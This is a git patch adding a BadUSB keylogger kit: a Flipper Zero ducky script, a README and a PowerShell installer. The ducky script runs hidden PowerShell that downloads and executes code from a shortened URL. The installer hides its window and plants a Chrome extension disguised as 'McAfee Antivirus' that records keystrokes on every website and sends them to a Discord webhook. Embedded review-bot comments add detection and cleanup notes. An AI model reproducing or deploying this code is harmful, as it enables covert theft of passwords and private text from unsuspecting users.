From a99aa684d7240e0bdd801769b4b59eeb530046d2 Mon Sep 17 00:00:00 2001 From: egieb <93350544+beigeworm@users.noreply.github.com> Date: Sun, 7 Jan 2024 16:26:12 +0000 Subject: [PATCH] Add files via upload --- .../Chrome-Browser-Keylogger.txt | 19 ++ Chrome-Extension-Keylogger/README.md | 11 ++ Chrome-Extension-Keylogger/main.ps1 | 165 ++++++++++++++++++ 3 files changed, 195 insertions(+) create mode 100644 Chrome-Extension-Keylogger/Chrome-Browser-Keylogger.txt create mode 100644 Chrome-Extension-Keylogger/README.md create mode 100644 Chrome-Extension-Keylogger/main.ps1 diff --git a/Chrome-Extension-Keylogger/Chrome-Browser-Keylogger.txt b/Chrome-Extension-Keylogger/Chrome-Browser-Keylogger.txt new file mode 100644 index 0000000..55af5e1 --- /dev/null +++ b/Chrome-Extension-Keylogger/Chrome-Browser-Keylogger.txt @@ -0,0 +1,19 @@ +REM Title: Keylogger To WebHook - Chrome Extension +REM Author: @beigeworm +REM Description: This script logs all Keystrokes and posts results to a discord webhook when the keyboard goes inactive for more than 10 secs. +REM Target: Windows 10 +REM Credit: Jakov +REM *SETUP* +REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook. + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove "-W H" to show the window) +DELAY 1000 +GUI r +DELAY 750 +STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_kl_to_dc | iex +ENTER + +https://github.com/beigeworm/BadUSB-Files-For-FlipperZero/blob/main/Chrome-Extension-Keylogger/main.ps1 \ No newline at end of file diff --git a/Chrome-Extension-Keylogger/README.md b/Chrome-Extension-Keylogger/README.md new file mode 100644 index 0000000..7080839 --- /dev/null +++ b/Chrome-Extension-Keylogger/README.md @@ -0,0 +1,11 @@ +
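Review bot: The `STRING` line in Chrome-Browser-Keylogger.txt executes `irm https://is.gd/bw_kl_to_dc | iex`, so what runs is whatever the shortened URL serves at that moment rather than the `main.ps1` added in this commit, and the header comments do not say so. The `REM Description` also disagrees with the rest of the patch: it says "all Keystrokes" and "10 secs", while main.ps1 only installs a Chrome content script and posts on a 20000 ms timer (the README says 30 seconds). I would reword it to `REM Description: Records keys typed into pages in Chrome through an unpacked extension and posts them to a Discord webhook every 20 seconds.` For anyone triaging this file, the launch itself is the highest-signal artefact: a Run-dialog `powershell` started with `-NoP -Ep Bypass -W H` that pipes a download into `iex` is what process command-line and script-block logging should alert on.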

Keylogger To WebHook - Chrome Extension

+ +SYNOPSIS +Creates the neccessary files for a chrome extension that logs all keystrokes on any website. +Then sends the collected keys to a discord webhook. + +USAGE +1. Replace $dc with your webhook. (if $dc is not defined in badUSB script or other.) +2. run the script. +3. test by going to a website in chrome browser (eg. google.com) and type some keys +4. Wait 30 seconds and check webhook for results. diff --git a/Chrome-Extension-Keylogger/main.ps1 b/Chrome-Extension-Keylogger/main.ps1 new file mode 100644 index 0000000..b8d3470 --- /dev/null +++ b/Chrome-Extension-Keylogger/main.ps1 
@@ -0,0 +1,165 @@ +$hookurl = "$dc" # YOUR_WEBHOOK_HERE + +# Hide the console +$Async = '[DllImport("user32.dll")] public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);' +$Type = Add-Type -MemberDefinition $Async -name Win32ShowWindowAsync -namespace Win32Functions -PassThru +$hwnd = (Get-Process -PID $pid).MainWindowHandle + +if ($hwnd -ne [System.IntPtr]::Zero) { + $Type::ShowWindowAsync($hwnd, 0) +} +else { + $Host.UI.RawUI.WindowTitle = 'hideme' + $Proc = (Get-Process | Where-Object { $_.MainWindowTitle -eq 'hideme' }) + $hwnd = $Proc.MainWindowHandle + $Type::ShowWindowAsync($hwnd, 0) +} + +# Webhook shortened URL handler +$hookurl = (irm $hookurl).url + +# Create the extension file +$DirPath = "C:\Users\Public\Chrome" +New-Item -ItemType Directory -Path $DirPath + +# Create the Main Javascript file (main.js) +$mainjs = @' +let keys = ""; +const current = document.URL; +document.addEventListener("keydown", (event) => { + const key = event.key; + if (key === "Enter") { + keys += "\n"; + return; + } + if (key === "Backspace") { + keys = keys.slice(0, keys.length - 1); + return; + } + if (key === "CapsLock" || key === "Shift") { + return; + } + if (key === "Control") { + keys += "[Ctrl]"; + return; + } + // Arrows + if (key === "ArrowLeft") { + keys += "[LeftArrow]"; + return; + } + if (key === "ArrowRight") { + keys += "[RightArrow]"; + return; + } + if (key === "ArrowDown") { + keys += "[DownArrow]"; + return; + } + if (key === "ArrowUp") { + keys += "[UpArrow]"; + return; + } + // End arrows + keys += key; + saveKeysLocal(); +}); + +window.setInterval(async () => { + keys = getKeysLocal(); + if (keys == "") { + return; + } + const message = `<${current}>\nLogged Keystrokes: ` + "```" + keys + "```"; + sendMessageToDiscord(discordWebhook, message); + keys = ""; + saveKeysLocal(); +}, 20000); // time in milliseconds + +async function sendMessageToDiscord(webhook, msg) { + await fetch(webhook, { + method: "POST", + headers: { + "Content-Type": 
"application/json", + }, + body: JSON.stringify({ + content: msg, + }), + }); +} + +function saveKeysLocal() { + localStorage.setItem("keys", keys); +} + +function getKeysLocal() { + return localStorage.getItem("keys"); +} +'@ +$mainjs | Out-File -FilePath "$DirPath/main.js" -Encoding utf8 -Force + +# Create the service worker (background.js) +$backgroundjs = @' +chrome.runtime.onMessage.addListener( + function (request, sender, sendResponse) { + sendResponse(request); + } +); +'@ +$backgroundjs | Out-File -FilePath "$DirPath/background.js" -Encoding utf8 -Force + +# Crwate the manifest file (manifest.json) +$manifest = @' +{ + "name": "McAfee Antivirus", + "description": "Antivirus chrome extension made by McAfee. Browse securely on the internet!", + "version": "2.2", + "manifest_version": 3, + "background": { + "service_worker": "background.js" + }, + "content_scripts": [ + { + "matches": [ + "*://*/*" + ], + "js": [ + "Webhook.js", + "main.js" + ] + } + ] +} +'@ +$manifest | Out-File -FilePath "$DirPath/manifest.json" -Encoding utf8 -Force + +#create the webhook file +"const discordWebhook = `"$hookurl`";" | Out-File -FilePath "C:\Users\Public\Chrome\Webhook.js" -Encoding utf8 -Force + +# Send keys to manually open chrome and add extension +$wshell = New-Object -ComObject wscript.shell +Start-Process chrome.exe example.com +sleep 3 +$wshell.AppActivate("chrome.exe") +$wshell.SendKeys("{TAB}") ;sleep -m 100 +$wshell.SendKeys("{TAB}") ;sleep -m 100 +$wshell.SendKeys("{TAB}") ;sleep -m 100 +$wshell.SendKeys("chrome://extensions/") ;sleep -m 100 +$wshell.SendKeys("{ENTER}") ;sleep 2 +$wshell.SendKeys("{TAB}") ;sleep -m 100 +$wshell.SendKeys(" ") ;sleep 1 +$wshell.SendKeys("{TAB}") ;sleep -m 100 +$wshell.SendKeys("{ENTER}") ;sleep 1 +$wshell.SendKeys("C:\Users\Public\Chrome");sleep -m 100 +$wshell.SendKeys("{ENTER}") ;sleep -m 200 +$wshell.SendKeys("{BACKSPACE}") ;sleep -m 100 +$wshell.SendKeys("{ENTER}") + +# Kill Chrome process +sleep 3 +$wshell.SendKeys("%{F4}") + 
+<# +Add-Type -AssemblyName System.Windows.Forms +[System.Windows.Forms.SendKeys]::SendWait('%{F4}') +#> \ No newline at end of file
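Review bot: main.ps1 has no header saying what it leaves on disk, and the manifest block presents the extension as "McAfee Antivirus" while its `content_scripts` entry matches `*://*/*`, so the name shown in chrome://extensions says nothing about what runs on every page. I would add a header comment such as `# Writes manifest.json, main.js, background.js and Webhook.js to C:\Users\Public\Chrome and loads that folder as an unpacked extension`, since those four files and that path are the artefacts a responder needs to find and remove. Webhook.js stores the resolved webhook URL in clear text as `discordWebhook`, which identifies the exfiltration endpoint during an investigation, and the typed text is buffered in each site's `localStorage` under the key `keys`. On managed machines, a Chrome policy that restricts installs to an allowlist and turns off extension developer mode should prevent the unpacked load that the `SendKeys` sequence depends on.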